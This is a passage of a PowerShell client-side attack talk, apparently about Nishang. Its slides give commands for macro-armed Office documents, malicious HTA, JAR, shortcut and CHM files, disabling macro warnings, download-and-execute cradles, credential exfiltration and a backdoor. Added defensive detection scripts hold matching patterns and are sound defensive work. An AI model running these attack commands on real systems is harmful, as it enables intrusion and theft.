Lethal Client Side Attacks using PowerShell
Nikhil Mittal
Get-Host 
• SamratAshok
• Twitter - @nikhil_mitt
• Blog – http://labofapenetrationtester.com
• Creator of Kautilya and Nishang
• Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.
• Previous Talks
– Clubhack’10, Hackfest’11, Clubhack’11, Black Hat Abu Dhabi’11, Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, Troopers’14
DeepSec 2014 2
Get-Content 
• Client Side Attacks 
• What is PowerShell 
• Why PowerShell? 
• Using PowerShell for client side attacks 
– Out-Word 
– Out-Excel 
– Out-Shortcut 
– Out-CHM 
– Out-Java 
– Out-HTA 
• Defense against such attacks. 
• Conclusion 
“Of war, there is open war, concealed war and silent war… one can prevail only by maintaining secrecy when striking again and again”
– Chanakya
Client Side Attacks 
• The server side is being locked down like never before: there are protection measures, patching and extensive monitoring on the server side. Though there is no dearth of vulnerabilities on the server side, exploiting them is getting more and more difficult.
• I noticed an unprecedented pace by clients while applying patches for Heartbleed, Shellshock etc.
• There is a higher chance of getting noticed if we are using server side attacks.
Client Side Attacks 
• The client side is still a lesser priority when it comes to patches, monitoring and other security measures.
• The “perimeter-ized” network is still the norm.
• I still found older versions of Adobe Reader on client machines during penetration tests.
• There is less chance of getting caught if the attack begins from a user’s machine.
Client Side Attacks 
• Another thing which helps client side attacks: when users use the same credentials, data, servers and emails on a daily basis, they tend to become casual about them. They cease to attach much importance to those things because they seem normal to them.
Client Side Attacks 
• It is still better not to rely on exploitation of memory corruption bugs in client side attacks. Generally, those are more likely to get caught.
• It would be really nice if we were able to launch client side attacks with things built-in or native to the Operating System we have to target.
• This is where PowerShell comes into the picture.
What is PowerShell 
• “Windows PowerShell® is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.”
http://technet.microsoft.com/en-us/library/bb978526.aspx
Why PowerShell 
• A shell and scripting language already present on the most common targets in a penetration test.
• A powerful method to “reside” in the systems and network.
• Provides easy access to .NET classes, WMI, the Windows API, WinRM, the Registry etc.
• Less dependence on msf, *nix scripting and scripts converted to executables.
Using PowerShell for Client Side Attacks
• Using PowerShell in a client side attack results in impressive post exploitation.
• Using PowerShell we could very easily have access not only to everything on the system but also to other machines on the domain network.
• That makes it an ideal scripting language for such attacks.
Using PowerShell for Client Side Attacks
• Let's begin with Microsoft Office Documents.
Out-Word.ps1 
• Use Out-Word to generate “armed” or “infected” MS Word documents.
• The generated Word document has an auto-executing macro which runs the provided PowerShell payload.
• The PowerShell payload executes silently without affecting the normal usage of the Word document.
Out-Word.ps1 
• The below command generates a Word file named Salary_Details.doc:
Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
• Though you would be unable to see the output in the above example, let's see what happened.
Out-Word.ps1 
• Notice that we are not getting any warning regarding Macros when we open the Doc. Why? Because of these lines in the code:
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$($Word.Version)\word\Security" -Name AccessVBOM -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$($Word.Version)\word\Security" -Name VBAWarnings -Value 1 -Force | Out-Null
Out-Word.ps1 
• We have effectively disabled Word Macro Security on the computer where the script is executed.
– So, if we execute the script on our system and send the files to the target, they will see the warning.
– But, if the script is executed on the target computer, no such warning would be displayed.
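The two New-ItemProperty lines above change settings only in the user hive of the machine where they run, so the defensive counterpart is to audit exactly those values on every workstation. The script below is an added example written for this page, not code from the talk or from Nishang. It assumes Office keeps its Trust Center macro settings under HKCU:\Software\Microsoft\Office\<version>\<application>\Security and that a Group Policy copy under HKCU:\Software\Policies\Microsoft\Office\... takes precedence over it; the function name Get-OfficeMacroSecurity is my own.

```powershell
# Added example (not part of the talk or of Nishang): audit the per-user Office
# macro settings that Out-Word/Out-Excel write. Read-only; prints one row per
# installed Office version and application.

# Values Office stores in VBAWarnings (Trust Center "Macro Settings"):
#   1 = Enable all macros (what Out-Word writes - unsafe)
#   2 = Disable all macros with notification (Office default)
#   3 = Disable all except digitally signed macros
#   4 = Disable all macros without notification
$VbaWarningsText = @{
    1 = 'Enable all (UNSAFE)'
    2 = 'Disable with notification (default)'
    3 = 'Signed macros only'
    4 = 'Disable all without notification'
}

function Get-OfficeMacroSecurity {
    [CmdletBinding()]
    param(
        # Office applications whose Security key is inspected
        [string[]]$Application = @('Word', 'Excel', 'PowerPoint')
    )
    # Installed Office versions appear as numeric subkeys (e.g. 14.0, 15.0, 16.0)
    $versions = Get-ChildItem -Path 'HKCU:\Software\Microsoft\Office' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' }

    foreach ($ver in $versions) {
        foreach ($app in $Application) {
            $v = $ver.PSChildName
            # Key Out-Word modifies; a script running as the user can change it freely
            $userKey   = "HKCU:\Software\Microsoft\Office\$v\$app\Security"
            # Key written by Group Policy; it takes precedence over the user key
            $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$v\$app\Security"

            $user   = Get-ItemProperty -Path $userKey   -ErrorAction SilentlyContinue
            $policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue

            $managed = ($null -ne $policy -and $null -ne $policy.VBAWarnings)
            $vba  = if ($managed) { $policy.VBAWarnings } elseif ($user) { $user.VBAWarnings } else { $null }
            $vbom = if ($policy -and $null -ne $policy.AccessVBOM) { $policy.AccessVBOM } elseif ($user) { $user.AccessVBOM } else { $null }

            $findings = @()
            if ($vba -eq 1)    { $findings += 'all macros enabled (VBAWarnings=1)' }
            if ($vbom -eq 1)   { $findings += 'programmatic access to VBA project enabled (AccessVBOM=1)' }
            if (-not $managed) { $findings += 'not enforced by policy: any user-level script can change it' }

            $vbaText  = if ($null -eq $vba) { 'not set (behaves as 2)' } else { "$vba - $($VbaWarningsText[[int]$vba])" }
            $vbomText = if ($null -eq $vbom) { 0 } else { [int]$vbom }

            [pscustomobject]@{
                Version       = $v
                Application   = $app
                VBAWarnings   = $vbaText
                AccessVBOM    = $vbomText
                PolicyManaged = $managed
                Findings      = ($findings -join '; ')
            }
        }
    }
}

Get-OfficeMacroSecurity | Format-Table -AutoSize -Wrap
```

The row to worry about is one with VBAWarnings 1 or AccessVBOM 1 and PolicyManaged False: that is precisely the state the slide's two lines leave behind. Setting the macro level through the Office Group Policy templates moves the effective value to the Policies key, which the user-level script cannot override.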
Out-Word.ps1 
• The default payload with the script is to download and execute, in memory, a PowerShell script. Thus, the easiest way to use it is:
Out-Word -PayloadURL http://yourwebserver.com/evil.ps1
Out-Word.ps1 
• The URL is passed to the below code:
"powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
Out-Word.ps1 
• Note that we could also pass arguments to the script being downloaded. For example:
Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil
• This is useful when the script loads a function in memory or a PowerShell Module is used.
• The Macro code uses WMI to create a process from the payload we pass to it.
Out-Word.ps1 
• Now, what if we get access to a file server and want to infect all files, or the files in a particular directory? Use the below command:
Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles
• In the above, macro-enabled .doc files would be created in the C:\docfiles directory for all the .docx files, with the same name and same LastWriteTime.
Out-Word.ps1 
• Use the -Recurse option to recursively generate .doc files in the docfiles directory:
Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles -Recurse
• Use -RemoveDocx to delete the original .docx files after the .doc files have been generated.
Out-Word.ps1 
• The LastWriteTime of the .docx file is copied to the newly generated infected file to make it look authentic.
• Also, if file extensions for known file types are hidden, “.docx” is added to the generated .doc files.
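The last three slides describe three artifacts a file-share sweep with -WordFileDir leaves behind: a .doc beside a .docx of the same name, a LastWriteTime copied from that .docx, and a double extension such as Report.docx.doc. The script below, an added example for this page and not code from the talk or from Nishang, checks a directory for all three and additionally looks inside each .doc for a VBA project. It assumes a legacy .doc is an OLE2 compound file whose directory entries store stream names as UTF-16LE and that a VBA project always contains a stream named _VBA_PROJECT; the function names are my own.

```powershell
# Added example (not part of the talk or of Nishang): look for the file-system
# artifacts that Out-Word -WordFileDir leaves behind: a .doc with the same base
# name and an identical LastWriteTime as an existing .docx, a double extension
# such as Report.docx.doc, and a VBA project inside the .doc. Read-only.

function Test-OleHasVbaProject {
    param([Parameter(Mandatory)][string]$FilePath)
    $bytes = [System.IO.File]::ReadAllBytes($FilePath)
    if ($bytes.Length -lt 8) { return $false }
    # Compound File Binary (OLE2) signature: D0 CF 11 E0 A1 B1 1A E1
    $sig = [byte[]](0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1)
    for ($i = 0; $i -lt 8; $i++) { if ($bytes[$i] -ne $sig[$i]) { return $false } }
    # OLE directory entries sit on 128-byte boundaries and store names as UTF-16LE,
    # so decoding the whole file as UTF-16LE keeps them readable. "_VBA_PROJECT" is
    # the stream every VBA project contains (MS-OVBA); a macro-free .doc has none.
    $asText = [System.Text.Encoding]::Unicode.GetString($bytes)
    return $asText.Contains('_VBA_PROJECT')
}

function Find-SuspiciousDocSiblings {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$Recurse
    )
    # Extension compared explicitly: the provider's -Filter '*.doc' would also match .docx
    $docs = Get-ChildItem -Path $Path -File -Recurse:$Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -ieq '.doc' }

    foreach ($doc in $docs) {
        $reasons = @()

        # Report.docx.doc displays as "Report.docx" when known extensions are hidden;
        # in that case the original .docx is simply the base name.
        $double = $doc.Name -match '\.docx\.doc$'
        if ($double) { $reasons += 'double extension (.docx.doc)' }
        $siblingName = if ($double) { $doc.BaseName } else { $doc.BaseName + '.docx' }

        # Same-named .docx next to it whose LastWriteTime was copied onto the .doc
        $sibling = Join-Path $doc.DirectoryName $siblingName
        if (Test-Path -LiteralPath $sibling) {
            $docx = Get-Item -LiteralPath $sibling
            if ($docx.LastWriteTime -eq $doc.LastWriteTime) {
                $reasons += 'LastWriteTime identical to sibling .docx'
            }
        }

        if (Test-OleHasVbaProject -FilePath $doc.FullName) { $reasons += 'contains a VBA project' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                File          = $doc.FullName
                LastWriteTime = $doc.LastWriteTime
                Reasons       = ($reasons -join '; ')
            }
        }
    }
}

# Usage on the directory named on the slides:
Find-SuspiciousDocSiblings -Path 'C:\docfiles' -Recurse | Format-Table -AutoSize -Wrap
```

A .doc that has a VBA project and shares its timestamp with a sibling .docx is the combination the slides produce; either trait alone is common enough in real document stores that the report lists the reasons rather than deciding for you. The file-level check does not see -RemoveDocx cases, where only the macro check applies.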
Out-Excel.ps1 
• Out-Excel works exactly the same as Out-Word, with the same features, payloads etc.
• I prefer Out-Excel as, in my experience, users are generally more OK with Macros in Excel than in Word.
Out-HTA.ps1 
• Use this to generate an HTML Application and an accompanying VBScript. These could be deployed on a web server.
• When a user opens the HTA, the VBScript is executed which, in turn, executes the specified PowerShell payload.
Out-HTA.ps1 
• The default name of the HTA is WindDef_WebInstall.hta and for the VBS it is launchps.vbs.
• Both files should be hosted in the same directory of a web server, or the HTA should be modified to point to the correct path of the VBScript.
Out-HTA.ps1 
• Use the below command to generate the files:
Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
• As in the other client side attacks we discussed, you can also use a PowerShell Module:
Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
Out-Java.ps1 
• Out-Java could be used to execute PowerShell commands and scripts.
• It outputs four files: a .java file which contains the Java source, a .class file which is the compiled Java class, a manifest.txt file and a JAR executable.
• It needs a JDK on the attacker’s machine.
Out-Java.ps1 
• Use the below command:
Out-Java -Payload "Get-Process" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
• To download and execute a script in memory, use this:
Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
Out-Java.ps1 
• You could also use PowerShell Modules:
Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
Out-Shortcut.ps1 
• Out-Shortcut creates a shortcut (.lnk) which could be used for executing PowerShell commands and scripts.
• When the target user clicks on the shortcut, which is set to PowerShell, the predefined command or script is executed.
• The target user will see a window flash/open.
Out-Shortcut.ps1 
• Use the below command to execute a PowerShell command:
Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
• Use the below command to download and execute, in memory, a PowerShell script:
Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1
Out-Shortcut.ps1 
• If Out-Shortcut is executed on the target, we can set a Hotkey for the shortcut so that it is executed every time the key is pressed:
Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'
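Everything the three Out-Shortcut slides set is stored as plain fields in the .lnk: a target of powershell.exe, an argument string with -WindowStyle hidden or a download cradle, a hotkey and a borrowed icon. The script below, an added example for this page and not code from the talk or from Nishang, reads those fields back from every shortcut in the folders a user normally clicks and reports the ones showing those traits. It assumes the WScript.Shell COM object's CreateShortcut method exposes TargetPath, Arguments, Hotkey, IconLocation and WindowStyle for an existing .lnk, and that [Environment]::GetFolderPath knows the Desktop and Start Menu folders; the function name and the indicator list are my own.

```powershell
# Added example (not part of the talk or of Nishang): inspect .lnk shortcuts in
# the places a user clicks them and flag the traits of an Out-Shortcut-style
# shortcut. Read-only.

function Get-SuspiciousShortcut {
    [CmdletBinding()]
    param(
        [string[]]$SearchPath = @(
            [Environment]::GetFolderPath('Desktop'),
            [Environment]::GetFolderPath('StartMenu'),
            [Environment]::GetFolderPath('CommonDesktopDirectory'),
            [Environment]::GetFolderPath('CommonStartMenu')
        )
    )
    # WScript.Shell reads the fields stored in a .lnk (target, arguments, hotkey, icon, window style)
    $wsh = New-Object -ComObject WScript.Shell

    # Argument fragments seen in the -Payload / -PayloadURL examples on this page
    $indicators = @(
        @{ Pattern = '-WindowStyle\s+hidden';              Reason = 'hidden window' },
        @{ Pattern = '-ExecutionPolicy\s+Bypass';          Reason = 'execution policy bypass' },
        @{ Pattern = '\bIEX\b|Invoke-Expression';          Reason = 'Invoke-Expression' },
        @{ Pattern = 'Net\.WebClient|DownloadString|DownloadFile'; Reason = 'download cradle' },
        @{ Pattern = '-(e|ec|enc|EncodedCommand)\s';       Reason = 'encoded command' }
    )

    $paths = $SearchPath | Where-Object { $_ -and (Test-Path $_) }
    $links = Get-ChildItem -Path $paths -Filter '*.lnk' -File -Recurse -ErrorAction SilentlyContinue

    foreach ($lnk in $links) {
        $sc        = $wsh.CreateShortcut($lnk.FullName)
        $target    = [string]$sc.TargetPath
        $argString = [string]$sc.Arguments
        $reasons   = @()

        if ($target -match 'powershell(_ise)?\.exe$|pwsh\.exe$') {
            $reasons += 'target is PowerShell'
            foreach ($ind in $indicators) {
                if ($argString -match $ind.Pattern) { $reasons += $ind.Reason }
            }
            # A hotkey means the payload re-runs every time the key is pressed
            if ($sc.Hotkey) { $reasons += "hotkey '$($sc.Hotkey)' bound" }
            # 7 = minimized; combined with a PowerShell target it hides the console
            if ($sc.WindowStyle -eq 7) { $reasons += 'window minimized' }
            # An icon borrowed from another program (e.g. notepad.exe) disguises what runs.
            # ",0" is what an unset icon reads back as.
            $icon = [string]$sc.IconLocation
            if ($icon -and $icon -notmatch '^,\d+$' -and $icon -notmatch 'powershell') {
                $reasons += "icon taken from $icon"
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Shortcut  = $lnk.FullName
                Target    = $target
                Arguments = $argString
                Hotkey    = $sc.Hotkey
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousShortcut | Format-List
```

Pass -SearchPath with a share or profile root to sweep more than the default folders; a PowerShell shortcut with a hotkey and a third-party icon is worth a look on its own, since neither is something the Windows installer or an administrator's "open a shell here" shortcut normally sets.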
Out-CHM.ps1 
• We could also use Compiled HTML Help files (CHM) to execute PowerShell commands and scripts.
• When the target opens the CHM file, the predefined command or script is executed.
• The target user will see a window flash/open.
Out-CHM.ps1 
• Use the below command to execute a PowerShell command:
Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Out-CHM.ps1 
• Use the below command to execute an encoded command/script:
Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use Invoke-Encode from Nishang for encoding.
Out-CHM.ps1 
• Use the below command to download and execute a script in memory:
Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
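What the HTA, Java and CHM slides have in common from a monitoring point of view is the parent process: a PowerShell console started by mshta.exe, java.exe or hh.exe (the HTML Help viewer) is something a workstation almost never does on its own, and the Office macro described earlier shows up under WmiPrvSE.exe because it creates its process through WMI. The script below is an added example for this page, not code from the talk or from Nishang. The rule is a plain function, first run over a few constructed records, then over Sysmon process-creation events if the Microsoft-Windows-Sysmon/Operational log exists on the host; it assumes Sysmon Event ID 1 carries Image, ParentImage and CommandLine as named EventData fields, and the function names and parent list are my own.

```powershell
# Added example (not part of the talk or of Nishang): hunt for PowerShell started
# by the hosts the Out-HTA, Out-Java, Out-CHM and Office-macro payloads run under.

# Parents from which a PowerShell process is rarely legitimate on a workstation.
# The Out-Word macro creates its process through WMI (Win32_Process.Create), so the
# child appears under WmiPrvSE.exe rather than under winword.exe.
$SuspiciousParents = @(
    'mshta.exe',                   # Out-HTA
    'hh.exe',                      # Out-CHM (HTML Help viewer)
    'java.exe', 'javaw.exe',       # Out-Java
    'wscript.exe', 'cscript.exe',  # standalone .vbs
    'winword.exe', 'excel.exe', 'powerpnt.exe',
    'wmiprvse.exe'                 # process created from a macro via WMI
)

function Test-ProcessCreation {
    param(
        [Parameter(Mandatory)][string]$Image,
        [Parameter(Mandatory)][string]$ParentImage,
        [string]$CommandLine = ''
    )
    $child  = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    $parent = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    if ($child -notin @('powershell.exe', 'powershell_ise.exe', 'pwsh.exe')) { return @() }

    $reasons = @()
    if ($parent -in $SuspiciousParents) { $reasons += "PowerShell spawned by $parent" }
    # Command-line traits shared by the -Payload / -PayloadURL options on this page
    if ($CommandLine -match '-WindowStyle\s+hidden')        { $reasons += 'hidden window' }
    if ($CommandLine -match '-ExecutionPolicy\s+Bypass')    { $reasons += 'execution policy bypass' }
    if ($CommandLine -match 'Net\.WebClient|DownloadString') { $reasons += 'download cradle' }
    if ($CommandLine -match '-(e|ec|enc|EncodedCommand)\s') { $reasons += 'encoded command' }
    return $reasons
}

function Find-SuspiciousPowerShellLaunch {
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $reasons = Test-ProcessCreation -Image $Record.Image -ParentImage $Record.ParentImage -CommandLine $Record.CommandLine
        if ($reasons) {
            [pscustomobject]@{ Parent = $Record.ParentImage; CommandLine = $Record.CommandLine; Reasons = ($reasons -join '; ') }
        }
    }
}

function Get-SysmonProcessCreation {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents -ErrorAction Stop |
    ForEach-Object {
        # Read fields by name from the event XML; positional indexes change between Sysmon versions
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{ TimeCreated = $_.TimeCreated; Image = $data['Image']; ParentImage = $data['ParentImage']; CommandLine = $data['CommandLine'] }
    }
}

# Constructed sample records (not real logs) mirroring the payloads on this page
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$SampleRecords = @(
    [pscustomobject]@{ Image = $ps; ParentImage = 'C:\Windows\System32\mshta.exe'; CommandLine = 'powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem' },
    [pscustomobject]@{ Image = $ps; ParentImage = 'C:\Windows\hh.exe';             CommandLine = 'powershell.exe -EncodedCommand <base64-placeholder>' },
    [pscustomobject]@{ Image = $ps; ParentImage = 'C:\Windows\explorer.exe';       CommandLine = 'powershell.exe -WindowStyle hidden -c IEX ((New-Object Net.WebClient).DownloadString(''http://PLACEHOLDER-WEBSERVER/x.ps1''))' },
    [pscustomobject]@{ Image = $ps; ParentImage = 'C:\Windows\explorer.exe';       CommandLine = 'powershell.exe' }   # a user opening a console normally: no hit
)

$SampleRecords | Find-SuspiciousPowerShellLaunch | Format-List
try   { Get-SysmonProcessCreation | Find-SuspiciousPowerShellLaunch | Format-List }
catch { Write-Warning "Sysmon log not readable on this host: $_" }
```

The third sample, the Out-Shortcut case, has explorer.exe as its parent just like a console the user opened from the Start menu, which is why the rule also looks at the command line; the parent check alone would miss it. Without Sysmon, the same fields are available from Security event 4688 once command-line auditing is enabled, though only newer Windows versions record the creator process name there.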
More complex attacks 
• Any of the discussed tools could be used for more effective attacks like:
Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments "Credentials | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/test/data.php"
More complex attacks 
• We could do some really cool stuff, like running a backdoor with a new communications channel:
Out-Shortcut -PayloadURL "http://192.168.254.1/Gupt-Backdoor.ps1" -Arguments "Gupt-Backdoor -MagicString op3n -Verbose"
More complex attacks 
• We could do Egress Testing:
Out-Shortcut -PayloadURL "http://192.168.254.1/FireBuster.ps1" -Arguments "FireBuster 192.168.254.1 4443-4447"
More complex attacks 
• Other machines on the network could be port scanned:
Out-Shortcut -PayloadURL "http://192.168.254.1/Port-Scan.ps1" -Arguments "Port-Scan -StartAddress 192.168.254.1 -EndAddress 192.168.254.254 -ResolveHost -ScanPort"
• We could do a port scan for all the hosts in the current network segment; it is unlikely that we know the network range as in the above example.
More complex attacks 
• We could also run other client side attacks. For example, let's infect every Word file in the C:\client directory:
Out-Shortcut -PayloadURL "http://192.168.254.1/Out-Word.ps1" -Arguments "Out-Word -PayloadURL http://192.168.254.1/Speak.ps1 -WordFileDir C:\client"
More complex attacks 
• We could force browse, or download and execute exploits to escalate privileges.
• On Windows 8, we could dump web credentials stored in the Windows Vault in plain text (admin privileges required).
• We could check if the current user has privileges to access other machines on the network.
• And much more.
Defense 
• User awareness is the best defense against such attacks.
• Removal of VBA from MS Office would help with the Office document attacks, but it could break so many things.
• Active monitoring of the user machines may also help in detecting such attacks.
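One concrete form of the "active monitoring" this slide recommends is PowerShell script block logging, which records the script text PowerShell actually executes (after any decoding) to Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log; every -PayloadURL variant on this page ends in the same IEX / New-Object Net.WebClient / DownloadString cradle, which is easy to match there. The script below is an added example for this page, not code from the talk or from Nishang. It assumes the policy value EnableScriptBlockLogging under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging is what Group Policy sets, that script block logging exists from PowerShell 5.0 / WMF 5 onward, and that in a 4104 event the script block text is the third property; the function names and pattern list are my own.

```powershell
# Added example (not part of the talk or of Nishang): check/enable PowerShell
# script block logging and hunt its 4104 events for the download cradle used by
# the -PayloadURL option of the Out-* scripts.

$SbLogKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Test-ScriptBlockLogging {
    $p = Get-ItemProperty -Path $SbLogKey -ErrorAction SilentlyContinue
    return ($null -ne $p -and $p.EnableScriptBlockLogging -eq 1)
}

function Enable-ScriptBlockLogging {
    # Same value the "Turn on PowerShell Script Block Logging" policy writes;
    # use the GPO for a fleet, this for a single machine or a lab. Needs an elevated prompt.
    if (-not (Test-Path $SbLogKey)) { New-Item -Path $SbLogKey -Force | Out-Null }
    New-ItemProperty -Path $SbLogKey -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null
}

# Each pattern is one ingredient of a cradle; two or more in one script block count as a hit,
# so a lone "Invoke-WebRequest" in an admin's script does not.
$CradlePatterns = @(
    'New-Object\s+(System\.)?Net\.WebClient',
    '\.DownloadString\(|\.DownloadFile\(',
    'Invoke-WebRequest|\biwr\b|Invoke-RestMethod',
    '\bIEX\b|Invoke-Expression',
    'FromBase64String'
)

function Test-ScriptBlockText {
    param([Parameter(Mandatory)][string]$Text)
    # Returns the patterns that matched so the caller can count and display them
    $hits = @()
    foreach ($p in $CradlePatterns) { if ($Text -match $p) { $hits += $p } }
    return ,$hits
}

function Find-DownloadCradle {
    param([int]$MaxEvents = 2000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        # In a 4104 event the script block text is the third property (index 2)
        $text = [string]$_.Properties[2].Value
        $hits = Test-ScriptBlockText -Text $text
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Matched     = ($hits -join ' | ')
                Snippet     = $text.Substring(0, [Math]::Min(160, $text.Length))
            }
        }
    }
}

# Constructed sample (not a real log entry): the cradle from the Out-* payloads with a placeholder URL
$sample = "IEX ((New-Object Net.WebClient).DownloadString('http://PLACEHOLDER-WEBSERVER/evil.ps1'))"
Write-Host ('Sample cradle matched {0} of {1} patterns' -f (Test-ScriptBlockText -Text $sample).Count, $CradlePatterns.Count)
Write-Host ('Benign text matched {0} patterns' -f (Test-ScriptBlockText -Text 'Get-Process | Sort-Object CPU').Count)

if (-not (Test-ScriptBlockLogging)) {
    Write-Warning 'Script block logging is off; run Enable-ScriptBlockLogging from an elevated prompt.'
}
Find-DownloadCradle | Format-Table -AutoSize -Wrap
```

Running this script on a host where logging is already on produces one hit of its own, the $sample line, which doubles as a check that 4104 events are actually being written. Two caveats a defender should keep in mind: the log only covers PowerShell 5 and later, so the PowerShell 2.0 engine should be removed where it is still installed, and forwarding 4104 to a central collector matters because a payload running as the user can clear a local event log it has rights to.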
Conclusion 
• Usage of PowerShell makes these attacks much more lethal and powerful.
• We need not stick to getting a shell; we could go much further using only client side attacks.
• The attacks would continue as long as users continue opening attachments and clicking on links; that means forever :)
Recommended PowerShell Tools 
• Nishang 
• PowerSploit 
• Posh-SecMod 
• Veil-PowerView 
• PowerUp 
• PoshSec 
• Kansa 
• Voyeur 
• Powercat 
Credits/Reference 
• Thanks to DeepSec for accepting me. 
• Macro code for MS Office documents has been taken from Matt’s work: https://github.com/enigma0x3
• The idea for Out-CHM is taken from this tweet and attached file: https://twitter.com/ithurricanept/status/534993743196090368
Thank You 
• Questions? 
• I am looking for contributors. 
• Nishang is available at 
https://github.com/samratashok/nishang 
• Follow me @nikhil_mitt 
• nikhil.uitrgpv@gmail.com 
• http://labofapenetrationtester.com/ 
Neo4j
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 

Recently uploaded (20)

Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Microsoft - Power Platform_G.Aspiotis.pdf
